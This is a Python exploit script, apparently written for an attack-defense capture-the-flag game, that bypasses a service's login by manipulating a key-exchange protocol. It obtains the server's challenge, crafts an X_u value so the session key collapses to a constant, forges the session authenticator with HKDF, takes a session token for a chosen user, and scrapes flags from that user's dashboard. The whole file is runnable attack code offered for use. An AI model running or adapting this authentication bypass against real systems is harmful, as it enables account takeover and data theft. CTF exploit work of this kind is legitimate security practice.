exploit2-login-bypass.py
#!/usr/bin/env python3
import sys
import requests
import hashlib
from Crypto.Protocol.KDF import HKDF
from Crypto.Hash import SHA256
import re
import json
# Group parameters used by exploit(): p is the modulus for the X_u arithmetic,
# q the modulus for the exponent d.  From the leading and trailing digits p
# appears to be 2*q + 1 (safe-prime shaped group) — TODO confirm.
p = 139819559489970727773674514602432894408386272642962276533082166612215714937961147220287901099797128817068030425326484141320785278983839593637016322911208624564325864627844438289920030667788568549384478133762504762305164349026988017587624141607584664958660506073490093963772276523455507226281029423012934325287
q = 69909779744985363886837257301216447204193136321481138266541083306107857468980573610143950549898564408534015212663242070660392639491919796818508161455604312282162932313922219144960015333894284274692239066881252381152582174513494008793812070803792332479330253036745046981886138261727753613140514711506467162643
# Service port; exploit() builds every URL as http://{ip}:{port}/...
port = 80
def exploit(ip, flag_id):
    """Run the challenge/session exchange against one host and return matched flags.

    ip      -- host running the service; the port comes from the module-level `port`.
    flag_id -- JSON string whose "user" field names the account to authenticate as.
    Returns the list of substrings of the dashboard page matching the flag pattern.
    KeyError/ValueError from a response that lacks the expected fields, and any
    requests exception, propagate to the caller.
    """
    user = json.loads(flag_id)["user"]
    alpha = "1234"
    base_url = f"http://{ip}:{port}/"
    user_api = base_url + f"api/auth/user/{user}/"

    def challenge(x_u):
        # Both challenge requests differ only in the X_u value they carry.
        body = {"user_id": user, "alpha": alpha, "X_u": x_u}
        return requests.post(user_api + "challenge", json=body)

    # Round 1: a throwaway X_u, sent only to obtain the server's challenge C.
    # C is hex; the '|'-separated field second from the end is read as P_u.
    first = challenge("1234").json()
    P_u = int(bytes.fromhex(first["C"]).split(b"|")[-2])

    # Everything below is computed from public inputs only (user id, fixed alpha,
    # the server's own P_u) — no per-user secret is involved.
    id1 = hashlib.sha256((user + alpha).encode()).hexdigest().upper()
    d = pow(int(hashlib.sha256(id1.encode()).hexdigest(), 16), 2, q)
    # X_u is the inverse of P_u^d mod p; presumably this makes the server-side
    # key material cancel to a constant (inferred from the fixed K_sess below —
    # confirm against the service source).
    crafted_X_u = pow(pow(P_u, d, p), -1, p)

    # Round 2: the real challenge with the crafted X_u; the reply carries ss_id.
    ss_id = challenge(str(crafted_X_u)).json()["ss_id"]

    # Authenticator derived from the constant key sha256(b"1") with id1 as the
    # HKDF context; the script expects the server's session key to equal it.
    K_sess = hashlib.sha256(b"1").hexdigest().upper().encode()
    derived = HKDF(K_sess, 32, b"0", SHA256, 1, id1.encode()).hex().upper()
    session = requests.post(user_api + "session", json={"A_u": derived, "ss_id": ss_id})
    cookie = session.json()["token"]

    # NOTE: base_url already ends in "/", so the path requested is "//dashboard";
    # kept exactly as the original did.
    dashboard = requests.get(base_url + "/dashboard", cookies={"session": cookie})
    return re.findall(r"[A-Z0-9]{31}=", dashboard.text)
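if __name__ == "__main__":
    # Usage: exploit2-login-bypass.py <ip> <flag_id_json>
    # Fail with a usage line instead of an IndexError when arguments are missing;
    # extra arguments are ignored as before.
    if len(sys.argv) < 3:
        sys.exit(f"usage: {sys.argv[0]} <ip> <flag_id>")
    ip = sys.argv[1]
    flag_id = sys.argv[2]
    print(exploit(ip, flag_id))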